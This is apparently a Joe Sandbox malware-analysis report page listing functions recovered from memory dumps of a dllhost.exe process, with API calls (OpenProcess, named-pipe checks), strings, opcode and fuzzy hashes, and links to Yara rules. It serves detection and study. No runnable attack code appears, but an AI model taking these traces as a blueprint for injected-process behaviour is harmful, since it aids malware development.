Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: becd46b8087623add916d14ccb839c44f2ca788b37935a93f0f6c92bbe63381b
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F9519432200BA08FEB748F919A48358B791FB66B97F144517EA49C7BD5C739D4E0C709

Function 0000025DC1AC3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000025DC1AC3972
StrStrW.SHLWAPI ref: 0000025DC1AC3990
StrToIntW.SHLWAPI ref: 0000025DC1AC39B7

Part of subcall function 0000025DC1AC1A30: OpenProcess.KERNEL32 ref: 0000025DC1AC1A56
Part of subcall function 0000025DC1AC1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1AC1A74
Part of subcall function 0000025DC1AC1A30: PathFindFileNameW.SHLWAPI ref: 0000025DC1AC1A83
Part of subcall function 0000025DC1AC1A30: lstrlenW.KERNEL32 ref: 0000025DC1AC1A8F
Part of subcall function 0000025DC1AC1A30: StrCpyW.SHLWAPI ref: 0000025DC1AC1AA2
Part of subcall function 0000025DC1AC1A30: CloseHandle.KERNEL32 ref: 0000025DC1AC1AB0

Part of subcall function 0000025DC1AC3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1AC272F), ref: 0000025DC1AC3FA0

Strings

pid_, xrefs: 0000025DC1AC3968

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: ee39a34659d846c54c6c9c8b950fb6f8c359cf2c96705b14c347dbcd33d13a1f
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 95117521314FA191EF30DBA9EC2835A52A4BB64783F8040269A49C3794EF7AC917C748

Function 0000025DC1CE3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000025DC1CE3972
StrStrW.SHLWAPI ref: 0000025DC1CE3990
StrToIntW.SHLWAPI ref: 0000025DC1CE39B7

Part of subcall function 0000025DC1CE1A30: OpenProcess.KERNEL32 ref: 0000025DC1CE1A56
Part of subcall function 0000025DC1CE1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1CE1A74
Part of subcall function 0000025DC1CE1A30: PathFindFileNameW.SHLWAPI ref: 0000025DC1CE1A83
Part of subcall function 0000025DC1CE1A30: lstrlenW.KERNEL32 ref: 0000025DC1CE1A8F
Part of subcall function 0000025DC1CE1A30: StrCpyW.SHLWAPI ref: 0000025DC1CE1AA2
Part of subcall function 0000025DC1CE1A30: CloseHandle.KERNEL32 ref: 0000025DC1CE1AB0

Part of subcall function 0000025DC1CE3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1CE272F), ref: 0000025DC1CE3FA0

Strings

pid_, xrefs: 0000025DC1CE3968

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: cef4abd84cc548dbd147c1cf87cef8990c5f82be2d2cfb2da980abf0694b6d04
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 76117211310FA191EB309BA5EE0935AE2A4FF64783F909026FE59C3794EF78D995C708

Function 0000025DC1AD1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000025DC1AD2027
WriteFile.KERNEL32 ref: 0000025DC1AD2304
WriteFile.KERNEL32 ref: 0000025DC1AD234A
GetLastError.KERNEL32 ref: 0000025DC1AD2409

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 618c4f346806f6869386af83dcdc8e4f1ba4afc516f53f157446461aeab3995e
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 53D1BA32714FA089EB21DFA5D84829C37B1F364B9AF404227DE5EA7B9ADA34C507C344

Function 0000025DC1CF1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000025DC1CF2027
WriteFile.KERNEL32 ref: 0000025DC1CF2304
WriteFile.KERNEL32 ref: 0000025DC1CF234A
GetLastError.KERNEL32 ref: 0000025DC1CF2409

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 916c2123a95a49aed1e549b66c05294aaf189c1b0e8d89b5fbac3fed83263e6a
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: F3D1FE32714EA089E721CFE5DA482DCBBB1F364B9AF404216EE5D97B99DA34C14AC344

Function 0000025DC1AC14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1AC14C6
HeapFree.KERNEL32 ref: 0000025DC1AC14D5
GetProcessHeap.KERNEL32 ref: 0000025DC1AC14E2
HeapFree.KERNEL32 ref: 0000025DC1AC14F1
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1501

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: f3c926fcb154368039c4aa6be254b0a2884a3c77f83800296fed4cdad50ce479
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 00012D32610FA0DAD724EFA6EC08149B7B1F798F82B054026EF5993714DF34D452C744

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744

Function 0000025DC1CE14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1CE14C6
HeapFree.KERNEL32 ref: 0000025DC1CE14D5
GetProcessHeap.KERNEL32 ref: 0000025DC1CE14E2
HeapFree.KERNEL32 ref: 0000025DC1CE14F1
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1501

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 633be7a3032aa5a3373e2564ea9ff883b7623231e15c71257cb1ce93c69e09e7
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 7A012D72610FA0DAE724DFA6ED08149B7A1F798F82B058026FF4993714DF34E491C744

Function 0000025DC1AD28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000025DC1AD28DF), ref: 0000025DC1AD2A12

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 25f7d8e22d68b1abac157d67b62f7e3e32e360a8d8f0e3f80ed82a51c7449bde
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3491DD32610F6189FB70EFA59C583AD2BA0F765B8BF444107DE4AA7B95DA34C487C708

Function 0000025DC1CF28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000025DC1CF28DF), ref: 0000025DC1CF2A12

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 67648c0bdd40e783fef39782d96d89ad398da7c6ebdc908b0bbc4235c970b7a5
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: AB91D132610E6589FB70CFE59E593ADABA0F364B8BF444107FE4A97B85DA34C446C308

Function 0000025DC1AC8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000025DC1AC80BC
GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC80CA
GetCurrentProcessId.KERNEL32 ref: 0000025DC1AC80D6
QueryPerformanceCounter.KERNEL32 ref: 0000025DC1AC80E6

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: e2d01f84e3ac2f34d540729beb0b603187f5b7d255d5c3a389b0a71bb7f3b9db
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 48115226710F148AEB10DFA1EC583A933B4F76976AF440E22EA6D877A4DF78C165C344

Function 0000025DC1CE8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000025DC1CE80BC
GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE80CA
GetCurrentProcessId.KERNEL32 ref: 0000025DC1CE80D6
QueryPerformanceCounter.KERNEL32 ref: 0000025DC1CE80E6

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 705fd1ff5d0669843429b365a9c5059f5dc909c3f28e1920570b520a5a953792
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: E3115E26710F258AEB10CFA0EC583A833A4F72975AF441E22FB6D867A4DF78C154C344

Function 0000025DC1AC27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025DC1AC28CC
StrCpyW.SHLWAPI ref: 0000025DC1AC28E5

Part of subcall function 0000025DC1AC3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1AC272F), ref: 0000025DC1AC3FA0

Strings

\\.\pipe\, xrefs: 0000025DC1AC28D7

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 72d8d41884776171b36e47a3191c3451492c59cfd896e26e9a0b8379c819140f
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: DF719136200FA145EB74EEAA9C683EA67A4F7A57C7F404017DD49C7B88DE36C506C744

Function 0000025DC1CE27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025DC1CE28CC
StrCpyW.SHLWAPI ref: 0000025DC1CE28E5

Part of subcall function 0000025DC1CE3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1CE272F), ref: 0000025DC1CE3FA0

Strings

\\.\pipe\, xrefs: 0000025DC1CE28D7

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: c81fecac8d17b6f50fee18dea65fcd93d9562f06d8df1071b7c5dc8a0cde3255
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 2571B332200FA141E7359EA69E483AAE794FBA5BC7F445017FD09C3B88DE75C681C708

Function 0000025DC1A980A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025DC1A980CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025DC1A98162

Strings

csm, xrefs: 0000025DC1A98149

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 1693f029ada729bddea1ff3700b2a2e728ee7475b29fe7eb031e7930e8343d8b
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 4151D532311F248ADB68CFA5D848B6C3391E364B9BF154126DA5A87788D779C8E3C704

Function 0000025DC1A99AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000025DC1A99BA7

Strings

RCC, xrefs: 0000025DC1A99B77
MOC, xrefs: 0000025DC1A99B6F

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: e748d60d31d589897fbb362e63f414ffb675fb37375e0d32c41f4194c54d8941
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 2461AF32504BC495EB70CF55E84439EB7A0F7A4B8AF044216EB8847B99DB7CC1D6CB08

Function 0000025DC1AC25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025DC1AC26C2
StrCpyW.SHLWAPI ref: 0000025DC1AC26D9

Strings

\\.\pipe\, xrefs: 0000025DC1AC26CD

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 15794ff91f761ea8eda75039f1b38ea34b964b176095a09625b8b641673c1e28
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: E851C636204FA181EE34DEA9ACAC3AA6761F7E5783F444027DD5983B49DB3BC406C748

Function 0000025DC1CE25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025DC1CE26C2
StrCpyW.SHLWAPI ref: 0000025DC1CE26D9

Strings

\\.\pipe\, xrefs: 0000025DC1CE26CD

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: dceac40239e2509856a1deddbcc73c2402383d07e58664e1961a40363e0c6cee
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
